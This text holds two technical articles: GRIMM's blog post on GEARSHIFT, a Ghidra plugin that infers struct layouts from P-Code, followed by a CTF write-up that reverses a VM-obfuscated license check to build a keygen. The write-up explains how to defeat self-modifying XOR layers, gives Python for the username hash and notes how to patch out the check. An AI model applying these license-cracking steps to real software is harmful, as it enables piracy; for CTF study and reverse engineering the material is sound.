Ghidra is a binary reverse engineering tool developed by the National Security Agency (NSA). To aid reverse engineers, Ghidra provides a disassembler and a decompiler that recovers high-level, C-like pseudocode from assembly, which makes the binary much easier to understand. Ghidra supports decompilation for over 16 architectures, which is one advantage it has over its main competitor, the Hex-Rays Decompiler.

One great feature of Ghidra is its API: almost everything Ghidra does in the backend is accessible through it. Additionally, the documentation is very well written, so the API functions are easy to understand.

Techniques

This section describes the high-level techniques GEARSHIFT uses to identify structure fields. GEARSHIFT performs static symbolic analysis on the data dependency graph of Ghidra's intermediate language in order to infer the structure fields.
Intermediate Language

Often, it's best to find the similarities among many different ideas and abstract them into one, for ease of understanding. This is precisely the idea behind intermediate languages. There are numerous architectures (x86, ARM, MIPS, etc.), and it isn't ideal to deal with each one individually. An intermediate language representation is created to support and generalize many different architectures. Each architecture can be translated into this intermediate language so that they can all be treated as one. Each analysis then only needs to be implemented once, on the intermediate language, rather than for every architecture.

Ghidra's intermediate language is called P-Code, and every P-Code instruction is well documented. Ghidra's disassembly listing has an option to display the P-Code representation of instructions, which can be enabled as shown here:

[Figure: Enable P-Code Representation in Ghidra]

To show what P-Code looks like, a few instructions from different architectures and their respective P-Code representations are shown below. With the basic set of instructions defined by the P-Code specification, all of the instructions from any architecture that Ghidra supports can be accurately modeled. Further, because GEARSHIFT operates on P-Code, it automatically supports all architectures supported by Ghidra. New architectures can be supported by implementing a lifter that translates the desired architecture to P-Code.

[Figures: x86 add instruction; MIPS addiu instruction; ARM add instruction]

Symbolic Analysis

Symbolic analysis has recently become popular, and a few symbolic analysis engines exist, such as angr, Manticore, and Triton. The main idea behind symbolic analysis is to execute the program while treating each unknown, such as a program or function input, as a variable. Any values derived from that variable are then represented as symbolic expressions rather than concrete values. Let's look at an example.
[Figure: Example Pseudocode]

In the above pseudocode, the only unknown input is val1, so it is stored symbolically. When the second line is executed, the value stored in val2 will be val1 * 5. The symbolic expressions continue to propagate in the same way, and val3 will be val1 * 5 + 1337.

The main issue with symbolic execution is the path explosion problem, i.e. how to handle the analysis when a branch in the code is hit. Because symbolic execution seeks to explore the entire program, both paths from the branch are taken. The branch condition is imposed on one resulting state and its inverse on the other. While sound in theory, this approach raises many issues when analyzing larger programs. Each conditional that is introduced can double the number of possible paths through the code, so the number of paths grows exponentially. Storing the symbolic states then becomes a storage constraint, and analyzing them becomes a time constraint.

Data Dependency

Data dependency is a useful abstraction for analyzing code. Each instruction changes some sort of state in the program, whether it is a register, a stack variable, or memory on the heap. This changed state may then be used elsewhere in the program, often in the next few instructions. If the state written by instruction A is read by instruction B, we say that B depends on A. Represented as a graph, there is a directed edge from A to B. The combination of all such dependencies in a program is the data dependency graph.

Ghidra uses the P-Code representation to provide the data dependency graph in an architecture-independent manner. Ghidra represents each state (register, variable, or memory) as a Varnode in the graph. The children of a node can be fetched with the getDescendants function, and the parent of a node with the getDef function.
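The parent/child relationship can be mimicked outside Ghidra with a small dictionary. This sketch uses hypothetical `get_def`/`get_descendants` helpers over an SSA-style table for the val1/val2/val3 example; these are plain Python, not Ghidra's Varnode API. It then runs the same kind of forward depth-first walk from a parameter that GEARSHIFT starts from.

```python
# Hypothetical SSA table: each output varnode has exactly one defining op,
# written as output -> (opcode, inputs). Ints are constants.
DEFS = {
    "val2": ("INT_MULT", ("val1", 5)),
    "val3": ("INT_ADD", ("val2", 1337)),
    "tmp": ("INT_SUB", ("other", 1)),  # unrelated to val1
}


def get_def(varnode):
    """Parent edge: the single op that defines varnode (None for inputs)."""
    return DEFS.get(varnode)


def get_descendants(varnode):
    """Child edges: every varnode whose defining op reads varnode."""
    return [out for out, (_, ins) in DEFS.items() if varnode in ins]


def forward_slice(param):
    """Depth-first walk over everything data-dependent on a parameter."""
    seen, stack, order = set(), [param], []
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        order.append(node)
        stack.extend(reversed(get_descendants(node)))
    return order


print(forward_slice("val1"))  # ['val1', 'val2', 'val3']
print(get_def("val3"))        # ('INT_ADD', ('val2', 1337))
```

Because every varnode has at most one entry in `DEFS`, `get_def` never needs to choose between several parents. This is the property that SSA form guarantees.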
As Ghidra uses Static Single Assignment (SSA) form, each Varnode has only a single parent, and Varnodes are chained together through P-Code instructions.

Implementation

Using a combination of these techniques, we can identify the structs of function parameters. GEARSHIFT's method drew inspiration from Value Set Analysis and is similar to penhoi's value-set-analysis implementation for analyzing x86-64 binaries. Loads and stores are performed at some offset from the struct pointer, so the plugin can infer the members of a struct from them. To infer the size of a member, the size of the load/store can be used (byte, word, dword, qword). Alternatively, if two contiguous members are accessed, we know to draw a boundary between them.

This plugin performs symbolic execution on the data dependency nodes. The P-Code instructions for a function parameter are traversed via a Depth-First Search (DFS) of the data dependency graph, and all stores and loads performed are recorded.

P-Code Symbolic Execution

The plugin performs the actual symbolic execution with a P-Code interpreter. For each P-Code instruction, it emulates the state and stores abstract symbolic expressions, with the function parameters as symbolic variables. Symbolic expressions are stored in a binary expression tree, which is defined by the Node class. Let's take an example of a symbolic expression and look at how it would be stored.

[Figure: Example Symbolic Expression]

Now let's look at a P-Code interpreter, such as the one for the INT_ADD opcode:

[Figure: GEARSHIFT INT_ADD P-Code Interpreter]

In the INT_ADD case, there are two parameters. The first parameter is usually a Varnode, and the second might be a constant or a Varnode added to the first. This function locates the symbolic expressions for the two parameters and outputs an add symbolic expression that combines them. Most of the P-Code opcodes are implemented in a similar manner.
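To make the interpreter idea concrete, here is a toy symbolic interpreter over three P-Code opcodes (INT_ADD, LOAD, STORE), using a hypothetical tuple encoding. The tuple format, the `Node` class and the `(kind, base, offset, size)` record are illustrative assumptions, not GEARSHIFT's classes. Real P-Code LOAD/STORE ops also carry an address-space input, which is omitted here. Addresses of the form `param + constant` are recorded as struct accesses. A loaded value becomes a fresh symbol, so accesses through it describe a nested struct.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Node:
    """Binary expression tree; leaves are symbol names (str) or constants (int)."""
    op: str
    left: object
    right: object

    def __str__(self):
        return f"({self.left} {self.op} {self.right})"


def base_and_offset(expr):
    """Return (symbol, offset) when expr is `sym` or `sym + const`, else None."""
    if isinstance(expr, str):
        return expr, 0
    if (isinstance(expr, Node) and expr.op == "+"
            and isinstance(expr.left, str) and isinstance(expr.right, int)):
        return expr.left, expr.right
    return None


def interpret(ops, params):
    """Symbolically execute (opcode, output, inputs) tuples; return struct accesses."""
    state = {p: p for p in params}  # parameters stay symbolic
    accesses = []

    def lookup(v):  # ints are constants, strs name varnodes
        return v if isinstance(v, int) else state[v]

    def record(kind, addr, size):
        loc = base_and_offset(addr)
        if loc is not None:
            accesses.append((kind, loc[0], loc[1], size))

    for opcode, out, ins in ops:
        if opcode == "INT_ADD":
            state[out] = Node("+", lookup(ins[0]), lookup(ins[1]))
        elif opcode == "LOAD":  # ins = (address varnode, size)
            addr = lookup(ins[0])
            record("load", addr, ins[1])
            state[out] = f"[{addr}]"  # loaded value becomes a fresh symbol
        elif opcode == "STORE":  # ins = (address varnode, value, size)
            record("store", lookup(ins[0]), ins[2])
        else:
            raise NotImplementedError(opcode)
    return accesses


# Roughly: p = *(u64 *)(arg1 + 8); *(char *)p = 'C'; *(u64 *)arg1 = p;
OPS = [
    ("INT_ADD", "u1", ("arg1", 8)),
    ("LOAD", "p", ("u1", 8)),
    ("STORE", None, ("p", 0x43, 1)),
    ("STORE", None, ("arg1", "p", 8)),
]
for access in interpret(OPS, ["arg1"]):
    print(access)
```

The second access is recorded against the base "[(arg1 + 8)]". That is how a pointer member leads to a nested struct in this sketch. A fuller version would also need to normalize expressions such as ((arg1 + 8) + 4).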
A few parts of the P-Code interpretation require careful consideration: the lookup_node and store_node functions, and the CALL opcode. The first two functions handle the mapping between Ghidra's Varnodes and the symbolic expression tree representation, whereas the CALL opcode handles the interprocedural analysis (described in the next section).

One small problem occurs during symbolic expression retrieval due to the nature of the DFS being performed. If an instruction uses a Varnode whose defining P-Code operation has not been traversed yet, the corresponding symbolic expression will not have been defined and will be unavailable to the interpreter. To solve this issue, GEARSHIFT traverses backwards from the node whose definition is needed until the node's full definition is obtained, with function arguments as the base case. This traversal is performed in the plugin's get_node_definition function. As an example of why this issue might occur, consider the function and data dependency graph below:

[Figure: Example Program With Undefined Nodes in a Depth First Search]

Because we are traversing in DFS order from the function parameters, we may require nodes that have not yet been encountered. In this case, we are finding the definition of temp3, which depends on temp2, yet temp2 is not yet defined, since the DFS has not reached that node. In this example, GEARSHIFT will traverse to temp2's and then arg1's Varnodes in order to define temp2 for use in temp3.

Interprocedural Analysis

Because a function parameter's struct members may be passed into another function, it is essential to perform interprocedural analysis so that any information from the called function's loads and stores is captured. For example, consider the example programs shown below. In the first case, we have to analyze function2 to infer that input->a is of type char*. Additionally, a function can return a value that may later be used to perform stores and loads.
In the second example, we need to know that the return value of function2 is input->a to be able to infer that the store *(c) = 'C'; indicates that input->a is a char*. To support these ideas, two types of analysis are required. One is forward analysis, which is what we have been doing by performing a DFS on function parameters and recording stores and loads. The second is backward analysis, i.e. starting at all the possible return value Varnodes of a function and obtaining their symbolic definitions in terms of the function parameters. This switching between forward and backward analysis is where the project gets its name.

Struct Interpolation

The final step is to interpolate the structs based on the recorded loads and stores. In theory, this is simple with the gathered information. If the value at a (struct, offset, size) location is itself dereferenced, we know that value is a pointer to either a primitive, a struct, or an array. We then only have to traverse these pointers and interpolate their members recursively, so that arbitrary nested structures are supported. This is implemented in GEARSHIFT's create_struct function.

However, one final issue remains: how do we know whether a dereferenced member points to a struct, an array, or a primitive? Differentiating between a primitive and a struct is easy, since a struct would contain dereferences, whereas a primitive would not. Differentiating between a struct and an array is harder, because both contain dereferences. GEARSHIFT's solution, which may not be the best, is to use the idea of loop variants. Intuitively, if we have an array, then we will be looping over it at some point in the function. Thus, there must exist a loop, and the array must be accessed via multiple indices. This method works well in the presence of loops that iterate through the array starting from index 0.
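The recursive interpolation and the basic rule just described can be sketched in Python. Everything here is hypothetical: the access record format (object path, offset, size, loop_variant) and this create_struct are simplifications for illustration, not GEARSHIFT's create_struct. A member is treated as a primitive when its value is never dereferenced. A dereferenced member points to an array if any access to the pointed-to object varies with a loop, and to a struct otherwise. Only the index-0 loop case is modelled; the offset and single-index cases discussed next are not handled.

```python
def create_struct(accesses, path=("arg1",)):
    """Build {offset: member} for the object reached through `path`.

    accesses: list of (path, offset, size, loop_variant), where path names the
    object being accessed, e.g. ("arg1",) for *arg1 and ("arg1", 8) for the
    object that the member stored at arg1+8 points to.
    """
    members = {}
    for obj, offset, size, _ in accesses:
        if obj == path:
            members.setdefault(offset, size)  # first size wins; unions are not modelled

    layout = {}
    for offset in sorted(members):
        child = path + (offset,)
        child_accesses = [a for a in accesses if a[0] == child]
        if not child_accesses:
            layout[offset] = ("primitive", members[offset])  # value never dereferenced
        elif any(a[3] for a in child_accesses):
            layout[offset] = ("array_ptr", child_accesses[0][2])  # indexed inside a loop
        else:
            layout[offset] = ("struct_ptr", create_struct(accesses, child))
    return layout


accesses = [
    (("arg1",), 0, 4, False),     # 4-byte value at arg1+0
    (("arg1",), 8, 8, False),     # pointer at arg1+8 ...
    (("arg1", 8), 0, 1, False),   # ... to an object with a byte at 0
    (("arg1", 8), 4, 4, False),   #     and a 4-byte value at 4
    (("arg1",), 16, 8, False),    # pointer at arg1+16 ...
    (("arg1", 16), 0, 2, True),   # ... indexed in a loop: array of 2-byte items
]
print(create_struct(accesses))
```

Recursion on the object path is what lets the same function describe arbitrarily nested structs.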
However, we have to consider the case where iteration begins at an offset, and the case where only a single array index is accessed. In the first case, the line between a struct and an array is blurry. If no other members exist before the iteration offset, then it is likely an array. However, if there are unaligned or varying-size accesses, then it is likely a struct. In the second case, based on the information available (a single index access), it can be argued that the item is better represented as a struct, as the reverse engineer will only ever see it accessed as such.

Finally, once structs are interpolated, GEARSHIFT uses Ghidra's API to automatically define these inferred structs in Ghidra's DataTypeManager and retype the function parameters. Additionally, it implements type propagation by logging the arguments to each interprocedural call; if any of them correspond to a defined struct type, then that type is applied.

Results

As an example of GEARSHIFT's struct recovery ability, let's analyze the GEARSHIFT example program. After opening the example program in Ghidra and running GEARSHIFT on the initgrabbag function, it recovers definitions for the two structs, as shown below. In the image below, the original structs are shown on the left, and the recovered structs are shown on the right:

[Figure: Example Program Struct Recovery]

Additionally, GEARSHIFT automatically updates the function definition, providing a cleaner decompilation:

[Figure: Example Program Decompilation Improvements]

While these results are incredibly accurate, the example program is a custom test case, which may not be very convincing. Instead, let's analyze a more practical example. During the Hack-A-Sat CTF 2020, the Launch Link challenge involved reversing a stripped MIPS firmware image that included a large number of complex structs. After solving the challenge, our team wrote a writeup that can be found here.
Through many hours of manual reverse engineering, we ended up with the struct shown on the left in the image below; the corresponding GEARSHIFT-recovered struct is shown on the right. GEARSHIFT gives amazing results, with the auto-generated struct actually being more accurate than the one obtained via manual reverse engineering. Furthermore, as the firmware is a MIPS binary, this example demonstrates that GEARSHIFT is not tied to a single architecture.

[Figure: Hack-A-Sat CTF 2020 Launch Link Struct Recovery]

Future Work

While the first iteration of GEARSHIFT can provide useful struct information for most programs, more complex structures can cause issues. Previous work in this area has highlighted a number of common problems in structure recovery algorithms, some of which affect GEARSHIFT as well. For instance, GEARSHIFT does not yet handle:

Multiple Accesses to the Same Structure Offset. If a structure has a union that accesses the data in multiple ways, GEARSHIFT will not be able to handle this case.
Duplicate Structures. Currently, two different structs will be defined even if the same struct is used in multiple places. One simple solution may be to merge structures with similar signatures; however, this approach will likely result in false positives.
Function and Global Variables. At the moment, GEARSHIFT only operates on function parameters and will not recover structures that are used as function-local or global variables.

Regardless of the above issues, GEARSHIFT can provide useful structure information in most cases. Further, because it relies only on static analysis, GEARSHIFT can even provide structure recovery information for binaries that the reverser cannot execute, such as the Hack-A-Sat CTF binary described above.

Conclusion

Structure recovery is often one of the first steps in understanding a program when reversing. However, manually creating structure definitions and applying them throughout a binary can be especially tedious.
GEARSHIFT helps solve this problem by automating the structure creation process and applying the structure definitions to the program. These structure definitions can then be used for further reversing efforts or a variety of other analyses, such as generating a first pass of an argument specification for in-memory fuzzing.

This type of research is a key part of GRIMM's application security practice. GRIMM's application security team is well versed in reverse engineering, as this blog demonstrates, as well as in many other areas of vulnerability research. If your organization needs help reversing and auditing software that you depend on, or identifying and mitigating vulnerabilities in your own products, feel free to contact us.

Source: https://blog.grimm-co.com/2020/11/automated-struct-identification-with.html

-

Reverse Engineering Obfuscated Code - CTF Write-Up

This is a write-up for one of the FCSC (French Cyber Security Challenge) reverse engineering challenges. It was the first time I had to deal with virtualized code, so my solution is far from being the best. Surely there were much quicker ways, but mine did get the job done. This write-up is essentially meant for beginners in obfuscated code reverse engineering.

Part 1: Type of challenge

This happens to be a keygen type of challenge; here are the rules (in French):

Basically, you have to download a binary that takes inputs and, much like licensed software, verifies those inputs against each other. This is meant to mimic the way proprietary software verifies license keys. The goal is to create a keygen: a script that generates valid inputs to feed to the license verification algorithm. Of course, with only an offline validation, the challenge would be trivial (a simple patch and let's go), but you have to validate your inputs against an online version of the same binary.

There are two inputs: a username and a serial. Executing it will yield:

root@kali:~# ./keykoolol
[+] Username: toto
[+] Serial: tutu
[!] Incorrect serial.

In these types of challenges, I would advise you to manually fuzz inputs. By sending special characters and strings with an invalid length, you might get an interesting error message. Keep in mind that the first step is to understand what the software expects as inputs. But it's not going to help here (that would be too easy).

Let's go roughly through the steps we will have to follow:

Download the binary
Disassemble it
Understand and implement the serial verification function
Implement an algorithm that, given a username, generates a corresponding serial
Test locally
Validate online
Get tons of points

Part 2: ELF analysis

The file is a 16 KB ELF file.
The command file gives:

keykoolol: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1422aa3ad6edad4cc689ec6ed5d9fd4e6263cd72, stripped

Nothing tremendously interesting here; the sections, though, reveal more interesting things (using readelf -e):

[14] .text PROGBITS 0000000000000730 00000730 0000000000001ce2 0000000000000000 AX 0 0 16
[16] .rodata PROGBITS 0000000000002420 00002420 00000000000004c0 0000000000000000 A 0 0 32
[24] .bss NOBITS 0000000000203020 00003010 0000000000002868 0000000000000000 WA 0 0 32

So .text contains our code, but rodata and bss are quite large: 1216 bytes (0x4c0) for rodata and about 10 KB (0x2868 = 10344 bytes) for bss. Something smells fishy. As a reminder, bss is meant for uninitialized global variables. It often contains things like session encryption keys and pretty much any runtime data that requires a globally shared pointer.

What is in rodata?

00000000: 0100 0200 5b2b 5d20 5573 6572 6e61 6d65  ....[+] Username
00000010: 3a20 000a 005b 2b5d 2053 6572 6961 6c3a  : ...[+] Serial:
00000020: 2020 2000 5b3e 5d20 5661 6c69 6420 7365     .[>] Valid se
00000030: 7269 616c 2100 5b3e 5d20 4e6f 7720 636f  rial!.[>] Now co
00000040: 6e6e 6563 7420 746f 2074 6865 2072 656d  nnect to the rem
00000050: 6f74 6520 7365 7276 6572 2061 6e64 2067  ote server and g
00000060: 656e 6572 6174 6520 7365 7269 616c 7320  enerate serials 
00000070: 666f 7220 7468 6520 6769 7665 6e20 7573  for the given us
00000080: 6572 6e61 6d65 732e 005b 215d 2049 6e63  ernames..[!] Inc
00000090: 6f72 7265 6374 2073 6572 6961 6c2e 0000  orrect serial...
000000a0: 0004 0000 0000 0000 0000 0000 0000 0000  ................
000000b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000000c0: 6e18 b017 c9f5 bf08 7400 000a 3752 0a00  n.......t...7R..
000000d0: 9895 1c00 7403 0006 881c 0008 7400 000a  ....t.......t...
000000e0: 3f9e 0800 5694 1c00 ad06 180c c60f 2002  ?...V......... .
000000f0: 8802 0006 8997 0c00 7c02 080c c973 1c00  ........|....s..
00000100: 5b00 190c 7c00 0006 fa1b 0c00 f701 1000  [...|...........
00000110: a7f3 1f0c 4b19 100c fc00 0006 5a41 0c00  ....K.......ZA..
00000120: 0995 1c00 8e08 180c 280b 2602 e802 0006  ........(.&.....
00000130: 6434 7bff 050c 0002 afb4 68ff de24 f21a  d4{.......h..$..
00000140: 0588 f40c fd5c dd12 c049 df13 b982 d01d  .....\...I......

As expected, we can see the strings the binary uses to tell us whether the entry is valid. But what is after offset 0x000000c0? The data looks like gibberish and cannot be interpreted directly, but is it random? Let's extract the rodata section using dd and analyze its entropy with binwalk -E:

rodata's entropy seems to be around 0.894; this is not high enough to qualify as random data. You probably already noticed distinguishable patterns in the sample: the NULL byte recurs often, the pattern 0006 appears four times, and 0c00 appears twice. For comparison, the entropy of random data is slightly above 0.97, a noticeable difference from the previous value.

Part 3: Binary disassembly

Let's quickly examine the main function of the binary:

We can see a call to the function in charge of validating the serial, followed by a conditional jump that prints either a valid response or a negative one. No surprise here; these are the strings we saw at the beginning of rodata. The interesting point is that, if there were no online check (a likely scenario with proprietary software), getting a valid prompt would be as trivial as replacing a 0x74 JZ with a 0x75 JNZ after the validation function returns. But we will address micropatching in another post.

So now, to the main part! Let's reverse this check_serial function.

grazpfo#$eq!!!
OK, I'm assuming that if you are still reading this, it is because you are used to seeing horrible things in IDA (and I have since learned that this one is actually a nice one…). Analyzing its parameters is going to help us understand what it is doing. It takes the variable I named RO_DATA_ARRAY as an argument:

Guess who's back? It is indeed the segment we computed the entropy of earlier. RO_DATA_ARRAY is copied (0x400 bytes) into the bss (keep that in mind, it will make sense later). I will refer to the offset of RO_DATA_ARRAY's copy in the bss as BSS_IR_ARRAY.

The main part of the validation function is actually a loop over all the values of this array, taken as dwords (4 bytes), checking the value of the least significant byte. It is a 256-case switch structure, and each value of this byte triggers a different piece of code in the validation function.

Guess what's going on here? You are looking at a virtual processor interpreting a custom bytecode, also known as an Intermediate Representation (IR). The original code has been split into basic blocks and translated into another, higher-level code. Let's get a bit more into the details:

Dispatcher: parses the intermediate representation and links each opcode with the code it is supposed to represent.
Handler: contains the actual code executed for each instruction.

Note the 4 branches that IDA puts on the side; they have a very specific role: they are the only conditional jumps used by all the code. The code is factorized in a way that makes it a pain to place a breakpoint at a specific execution step. Please accept my most sincere apologies, as I clearly cannot organize an IDA graph in a clean way.
I know it looks terrible, but it's the best I had…

Here is the IR to x86 translation for the conditional jumps:

15 : jump if greater (must be lower)
14 : jump if lower (must be higher or equal)
0A : jump if not zero (must be equal)
09 : jump if zero (must be different)

Studying the IR, we start spotting coding patterns. Here is an example:

0x08401ca4   decrement r9d by 1
0x090003d4   if r9d != 0, jump to 3d4, else, next
0x0e210cb5   mul reg+a = c * reg+a
0x00529386   increment int_val register
0x180003e8   jump to 0F3554D7 (3e8)

This is the end of the loop that verifies the length of the input. Here we see two kinds of jumps: 08 09 is a sub, jz, and 18 is a jmp. The sequence 08 09 0e 00 18 marks the end of a for loop, with a goto. The loop counter is initialized with 0x100, so we know our serial should be 256 characters long. I won't detail it here, but the next loop checks every char in the serial against the regexp [0-9a-fA-F]*. So the actual length of the serial is 0x80 bytes, since we are supposed to input a hex-encoded value.

Doing this, we learn two important things about the virtual machine:

The IR syntax
Its macroscopic behaviour

Regarding the IR syntax, I did not completely understand all the instructions (00 to FF), but here is an example. Some instructions are in the form iiaccxxx (stored as 0xXXCXACII), where:

ii is the opcode (1 byte)
rax <= a, dest address, located at BSS_IR_ARRAY+rax*4 (4 bits)
rcx <= cc, source address, located at BSS_IR_ARRAY+rcx*4 (1 byte)
xxx is the next instruction's address (12 bits)

Addresses resolved by parameters a and c are in the bss section. There is a reason for that: the bss actually contains the stack of our virtual machine! And the part right before the beginning of the stack is understood by IDA as a section containing 2-byte values: these are our registers! Also, rodata is supposed to contain the code, so why copy the code to the stack?
The answer lies in the next level of obfuscation: the code is self-modifying, hence the write permission requirement. Here is an example of a code block that is XORed:

0x1e53403a  (l1' = enc(l6, l1))  | 0xca90f29b
0x00303373                       | 0xd4f381d2
0x0c340d94                       | 0xd8f7bf35
0x00462b98                       | 0xd4859939
0x0c410a96                       | 0xd882b837
0x00575618                       | 0xd494e4b9
0x0c5508f0                       | 0xd896ba51

The right column contains the IR as it is stored in the rodata segment, and the left column is obtained after a XOR with 0xA1B2C3D4 (applied to little-endian dwords, which is why the key shows up byte-reversed, as d4c3b2a1, when the two columns are compared as printed). So the opcodes d8, d4, etc. seen in the raw bytes are not real instructions; they send you down a wrong path until the block is decoded. There are three stages of code XORing, pretty easy to detect once you have been tricked by the first one. After deobfuscating all the IR, here are the macro steps we obtain:

STEP1: verify serial charset
STEP2: hash username
STEP3: decode new instructions with C1D2E3F4
STEP4: decode hex serial
STEP5: decode new instructions with A1B2C3D4
STEP6: encrypt 32 rounds of AES
STEP7: decode new instructions with AABBCCDD
STEP8: loop over serial and verify value byte per byte

Part 3: Hashing the username

Let's dig a bit deeper into the hashing function:

0x0e 3 0d 658 -> (username[i]+j)*0D
0x13 3 25 0e7 -> (username[i]+j)*0D ^ 25
0x11 3 ff 64b -> ((username[i]+j)*0D ^ 25) % FF => res

Here we can clearly see the syntax with the opcodes and parameters described above: 0e is a multiplication, and parameter c contains the value we multiply by; 13 is a XOR with parameter c; and 11 computes the remainder of the Euclidean division by parameter c (here ff). All those operations are applied to the value in register 3 (the value of parameter a). This computes the first 16-byte line of the hash, from which 5 other lines are derived, totaling 96 bytes.
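The two decoding layers described above can be sketched in Python. This is a reconstruction from the values in this write-up, not the binary's code, and two points are assumptions: that the XOR is applied to little-endian dwords (consistent with the table above, where each printed decoded/raw pair differs by d4c3b2a1), and that the printed iiaccxxx notation is the four instruction bytes in memory order. The helper names xor_decode, printed, Insn and decode are hypothetical.

```python
import struct
from typing import NamedTuple


def xor_decode(blob: bytes, key: int) -> bytes:
    """XOR every little-endian dword of blob with key (e.g. 0xA1B2C3D4)."""
    out = bytearray()
    for (dword,) in struct.iter_unpack("<I", blob):
        out += struct.pack("<I", dword ^ key)
    return bytes(out)


def printed(blob: bytes) -> list:
    """Render dwords the way the write-up prints them: memory bytes read in order."""
    return [int.from_bytes(blob[i:i + 4], "big") for i in range(0, len(blob), 4)]


class Insn(NamedTuple):
    opcode: int  # ii, 8 bits
    a: int       # a, 4 bits: destination slot (BSS_IR_ARRAY + a*4)
    c: int       # cc, 8 bits: source slot or immediate
    nxt: int     # xxx, 12 bits: address of the next instruction


def decode(word: int) -> Insn:
    """Split a word written in iiaccxxx notation into its fields."""
    return Insn((word >> 24) & 0xFF, (word >> 20) & 0xF, (word >> 12) & 0xFF, word & 0xFFF)


raw = bytes.fromhex("ca90f29b" "d4f381d2" "d8f7bf35")  # first rows of the right column
print([hex(w) for w in printed(xor_decode(raw, 0xA1B2C3D4))])
# ['0x1e53403a', '0x303373', '0xc340d94']

for word in (0x0E30D658, 0x133250E7, 0x113FF64B):  # the three hashing instructions
    print(decode(word))
```

Decoding the three hashing instructions yields opcodes 0x0e, 0x13 and 0x11, all with a = 3 and c = 0x0d, 0x25 and 0xff, matching the reading given above.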
I reimplemented the hashing algorithm in Python:

from collections import deque

def derived_key(tkey):
    # Extend the 16-byte transient key to 96 bytes: each new 16-byte line is
    # derived from the previous one as ((b * 3) ^ 0xFF) & 0xFF.
    s = bytearray(tkey)
    for k in range(5):
        s += bytes(((s[i + k * 16] * 0x03) ^ 0xFF) & 0xFF for i in range(16))
    return bytes(s)

def transient_key(username):
    # XOR together one 16-byte line per username character, each line
    # rotated right by the character's index.
    temp = bytes(16)
    for i, ch in enumerate(username.encode()):
        line = deque((((ch + j) * 0x0D) ^ 0x25) % 0xFF for j in range(16))
        line.rotate(i)
        temp = bytes(t ^ x for t, x in zip(temp, line))
    return temp

You'll notice whoever designed this loved circular shifts. For a given username, you obtain the same hash as the binary by computing derived_key(transient_key(username)).

Something pretty curious happens at the end of this hashing algorithm: the binary copies the last two lines of the serial and appends them to the 96-byte hash we just obtained. With an example input:

Username: ecsc
Serial:
9f96d7f6380d729ffad1f09783706997
463911a0770040b6a78c0108563727fd
f4212b9de637638babe79c765c69238e
3e0205d228b9460c3857e112b84bb3ac
069421c9fca7e74a430c6526c0c53d71
bf8f00efb05897245041e27a7c564ea4
41414141414141414141414141414141
41414141414141414141414141414141

Here is a snapshot of the stack (the bss, but you get it) at the location that stores both the serial and the username's hash:

In the box is the result of the hashing algorithm. Highlighted in yellow are the two lines of 'A's that were hex-decoded and appended after the hash. You can already tell that this input was not chosen randomly, and I'll explain why it looks like this.

Part 4: Crypto - where the fun starts

To summarize:

The binary checks the serial: it must be a hex-encoded string that decodes to 0x80 bytes.
The username is hashed; the result is 0x60 bytes long.
The last two lines of the serial are appended to this result, totaling 0x80 bytes.

The reason those last two lines are treated differently is that they are actually an implicit parameter: they are encryption keys.
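The serial layout summarized above can be made concrete with a small Python helper. It is a sketch under the assumptions stated in this write-up: a 0x100-character hex string, decoded into eight 16-byte lines, of which the last two are the keys. split_serial and verification_buffer are hypothetical names, and the 96-byte hash passed to verification_buffer would come from derived_key(transient_key(username)).

```python
import re

HEX_SERIAL = re.compile(r"[0-9a-fA-F]{256}")  # 0x100 hex characters -> 0x80 bytes


def split_serial(serial: str):
    """Return (six 16-byte data lines, k1, k2) from a hex-encoded serial."""
    if not HEX_SERIAL.fullmatch(serial):
        raise ValueError("serial must be exactly 256 hex characters")
    raw = bytes.fromhex(serial)
    lines = [raw[i:i + 16] for i in range(0, len(raw), 16)]
    return lines[:6], lines[6], lines[7]


def verification_buffer(hash96: bytes, k1: bytes, k2: bytes) -> bytes:
    """The 0x80-byte buffer: the 0x60-byte username hash followed by both key lines."""
    if len(hash96) != 0x60:
        raise ValueError("hash must be 0x60 bytes")
    return hash96 + k1 + k2


serial = (
    "9f96d7f6380d729ffad1f09783706997" "463911a0770040b6a78c0108563727fd"
    "f4212b9de637638babe79c765c69238e" "3e0205d228b9460c3857e112b84bb3ac"
    "069421c9fca7e74a430c6526c0c53d71" "bf8f00efb05897245041e27a7c564ea4"
    + "41" * 32
)
blocks, k1, k2 = split_serial(serial)
print(len(blocks), k1)  # 6 b'AAAAAAAAAAAAAAAA'
```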
Username: ecsc
Serial:
9f96d7f6380d729ffad1f09783706997
463911a0770040b6a78c0108563727fd
f4212b9de637638babe79c765c69238e
3e0205d228b9460c3857e112b84bb3ac
069421c9fca7e74a430c6526c0c53d71
bf8f00efb05897245041e27a7c564ea4
Keys:
41414141414141414141414141414141
41414141414141414141414141414141

Once this hash is computed, the code encrypts the serial using the AES-NI instruction aesdec over several rounds, and checks, byte per byte, that the decryption result is equal to the hash. Here is the basic block performing the encryption:

The xmm registers are 128-bit registers, so each block and each round key is 128 bits (16 bytes) long. We will therefore name each 16-byte line of the serial, as they correspond to actual encryption blocks:

Username: ecsc
Serial:
9f96d7f6380d729ffad1f09783706997 - l1
463911a0770040b6a78c0108563727fd - l2
f4212b9de637638babe79c765c69238e - l3
3e0205d228b9460c3857e112b84bb3ac - l4
069421c9fca7e74a430c6526c0c53d71 - l5
bf8f00efb05897245041e27a7c564ea4 - l6
Keys:
41414141414141414141414141414141 - k1
41414141414141414141414141414141 - k2

We are then looking for a serial satisfying:

serial == decrypt(hash, key)

Now, the encryption algorithm itself is based on single AES rounds, but the block chaining is entirely custom and uses circular shifts (hey, you again). One round of this block encryption looks like this:

You can already guess that the order of decryption is going to be very important, as some round keys will themselves be encrypted. To test this round by round, I wrote a very simple x64 program (it will segfault, but it is meant to be run in a debugger to read the registers' values):

section .text
global _start
_start:
    mov rax, 0x4141414141414141
    movq xmm0, rax
    mov rax, 0x4141414141414141
    pinsrq xmm0, rax, 1
    mov rax, 0x1010101010101010
    movq xmm1, rax
    mov rax, 0x1010101010101010
    pinsrq xmm1, rax, 1
    aesdec xmm0, xmm1
    ret

This applies a single AES round (aesdec, one decryption round) to the block 0x41414141414141414141414141414141 with the round key 0x10101010101010101010101010101010.
